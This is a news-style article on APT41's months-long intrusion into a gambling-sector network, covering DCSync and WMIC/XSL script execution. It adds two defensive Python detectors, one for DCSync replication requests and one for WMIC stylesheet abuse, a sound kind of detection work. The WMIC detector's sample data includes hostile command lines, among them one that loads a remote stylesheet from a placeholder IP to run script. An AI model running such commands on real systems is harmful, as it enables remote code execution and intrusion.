Invisible thieves: how APT41 hid the traces of its activity for almost a year

The illusion of security persists until it is too late.

The APT41 group carried out a cyberattack on the gambling sector, operating covertly and adapting its tooling to the defenders' actions. Also known as Brass Typhoon, Earth Baku, Wicked Panda and Winnti, the group spent nearly nine months inside the network of a customer in that industry, collecting sensitive data and evading security controls.

The Israeli company Security Joes, which took part in the incident investigation, reported that the attackers exfiltrated network configurations, user passwords and data from the LSASS process. The company's founder, Ido Naor, noted: "Hackers modified tools based on the actions of defenders, maintaining access and quietly changing strategies."

The attack used techniques similar to those seen in 'Operation Crimson Palace', tracked by Sophos. Naor also stressed that the campaign was likely financially motivated, despite the group's state backing.

APT41 used a sophisticated set of tactics to circumvent security measures and establish covert remote-access channels. One of them was DCSync: abusing directory-replication rights to pull password hashes from a domain controller, take over administrator accounts and expand access. Phantom DLL hijacking and legitimate system utilities such as wmic.exe were also used.
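DCSync leaves a well-defined trace on the domain controller, so the paragraph above is a natural place for a detection example. The following is an added illustration, not code from the Security Joes investigation: it scans flattened Windows Security event 4662 records for the directory-replication control-access rights that DCSync requests and flags any subject that is not on an allow-list of domain controllers and sync accounts. The CORP domain, the account names and the sample records are constructed for the example.

```python
"""Flag possible DCSync requests in Windows Security event 4662 records.

Added illustration for the DCSync technique mentioned above; not code from
the Security Joes investigation. DCSync asks a domain controller to replicate
directory data the way another DC would, which hands back password hashes.
On the DC this is logged as event 4662 whose Properties field carries the
directory-replication control-access rights below. Only domain controllers
and a few dedicated sync accounts legitimately exercise them, so any other
subject requesting them deserves an alert.
"""
import re

# Well-known control-access right GUIDs exercised by DCSync.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed allow-list for a fictitious domain CORP: DC machine accounts end in
# '$'; MSOL_sync stands in for an Azure AD Connect style account. Tune per site.
ALLOWED_SUBJECTS = {"CORP\\DC01$", "CORP\\DC02$", "CORP\\MSOL_sync"}

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


def parse_event(line):
    """Parse one flattened 'Key=Value; Key=Value' record into a dict."""
    fields = {}
    for part in line.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def dcsync_rights(event):
    """Return the replication rights a non-allow-listed subject requested."""
    if event.get("EventID") != "4662":
        return []
    if event.get("SubjectUserName", "") in ALLOWED_SUBJECTS:
        return []
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def detect_dcsync(lines):
    """Return (subject, object, rights) for each record that looks like DCSync."""
    hits = []
    for line in lines:
        event = parse_event(line)
        rights = dcsync_rights(event)
        if rights:
            hits.append((event.get("SubjectUserName"), event.get("ObjectName"), rights))
    return hits


# Constructed sample records (not real telemetry). The second record is the
# attack: an ordinary user account pulling Get-Changes and Get-Changes-All on
# the domain naming context; the first is a DC doing the same legitimately.
SAMPLE_EVENTS = [
    "EventID=4662; SubjectUserName=CORP\\DC02$; ObjectName=DC=corp,DC=local; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=CORP\\jdoe; ObjectName=DC=corp,DC=local; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=CORP\\jdoe; ObjectName=CN=Users,DC=corp,DC=local; "
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624; SubjectUserName=CORP\\jdoe; LogonType=3",
]

if __name__ == "__main__":
    for subject, target, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspected: {subject} on {target} requested {', '.join(rights)}")
```

The allow-list is the part that needs local care: every domain controller's machine account and any legitimate replication consumer (Entra ID Connect, some backup and identity products) must be on it, otherwise the rule is noisy; conversely, a freshly created account appearing in the hits list is exactly the "administrator account takeover" the article describes.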

Although the exact initial-access method remains unknown, phishing emails were most likely used, since no exploitation of externally exposed applications and no supply-chain compromise were found. Once inside, the attackers focused on administrator and developer accounts to keep control of the infrastructure.

Security Joes researchers found that the attackers temporarily halted their activity after being detected, but later returned with an updated approach: obfuscated JavaScript embedded in an XSL file, executed through the WMIC utility to run malicious commands.

A distinctive feature of the campaign was that the code only acted on hosts whose IP address contained the substring "10.20.22", which points to the VPN address range being the intended target. This filter let the attackers touch only the devices they were interested in.
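The two preceding paragraphs describe the WMIC/XSL stage only in outline. The block below is an added example, not code from the Security Joes report. Its assumption is the mechanism WMIC is known to offer for this: the /format switch accepts any stylesheet path or URL, and the XSL engine executes script blocks embedded in that stylesheet, so a signed Microsoft binary ends up running attacker JavaScript (the technique usually called "Squiblytwo"). Benign use of /format almost always names one of the built-in stylesheets that live in %SystemRoot%\System32\wbem, which is what the classifier keys on. The process records are constructed.

```python
"""Spot WMIC being pointed at an attacker-controlled XSL stylesheet.

Added illustration for the WMIC/XSL technique described above; not code from
the Security Joes report, which only states that WMIC ran obfuscated
JavaScript from an XSL file. Assumed mechanism: "wmic ... /format:<xsl>"
loads an arbitrary local or remote stylesheet and executes the script inside
it. Built-in format names resolve to %SystemRoot%\\System32\\wbem\\*.xsl, so
anything else named in /format is worth a look.
"""
import ntpath
import re

# Built-in stylesheet names shipped in System32\wbem (lower-case).
BUILTIN_FORMATS = {
    "list", "table", "csv", "hform", "htable", "htable-sortby", "mof",
    "rawxml", "textvaluelist", "texttable", "texttablewsys", "value", "xml",
}

# Matches /format:value, /FORMAT:"quoted value" and -format:value.
FORMAT_RE = re.compile(r'[/-]format:\s*(?:"([^"]*)"|(\S+))', re.I)


def classify_wmic(image, command_line):
    """Return a reason string if the wmic command looks like XSL abuse, else None."""
    # ntpath handles Windows paths regardless of the host the scanner runs on.
    if ntpath.basename(image).lower() != "wmic.exe":
        return None
    match = FORMAT_RE.search(command_line)
    if not match:
        return None
    target = (match.group(1) or match.group(2)).strip()
    low = target.lower()
    if re.match(r"^(https?|ftp)://", low) or low.startswith("\\\\"):
        return "remote stylesheet: " + target
    if "\\" in low or "/" in low:
        if "\\system32\\wbem\\" in low and low.endswith(".xsl"):
            return None  # an explicit path to a shipped stylesheet
        return "stylesheet outside System32\\wbem: " + target
    name = low[:-4] if low.endswith(".xsl") else low
    if name in BUILTIN_FORMATS:
        return None
    return "non-built-in stylesheet name: " + target


def scan(records):
    """Return [(command_line, reason)] for every suspicious (image, cmdline) record."""
    hits = []
    for image, cmd in records:
        reason = classify_wmic(image, cmd)
        if reason:
            hits.append((cmd, reason))
    return hits


# Constructed process-creation records (Image, CommandLine), not real telemetry.
# Records 3-5 are the abuse patterns; the rest are normal administrative use.
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
SAMPLE_PROCESSES = [
    (WMIC, "wmic os get caption /format:list"),
    (WMIC, "wmic /node:SRV01 process list brief /format:csv"),
    (WMIC, 'wmic os get /FORMAT:"https://198.51.100.7/update.xsl"'),
    (WMIC, r"wmic process list /format:C:\Users\Public\notes.txt"),
    (WMIC, "wmic os get /format:evil.xsl"),
    (WMIC, r"wmic os get /format:C:\Windows\System32\wbem\csv.xsl"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -c whoami"),
]

if __name__ == "__main__":
    for cmd, reason in scan(SAMPLE_PROCESSES):
        print(f"{reason}\n    {cmd}")
```

The IP-substring check the article mentions lived inside the stylesheet's script, so the process-creation event looks identical on every host that ran the command; the command line, not the host, is what to alert on. Note also that the file extension is irrelevant to WMIC (the .txt example is loaded as a stylesheet all the same), which is why the classifier judges the location rather than the suffix.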
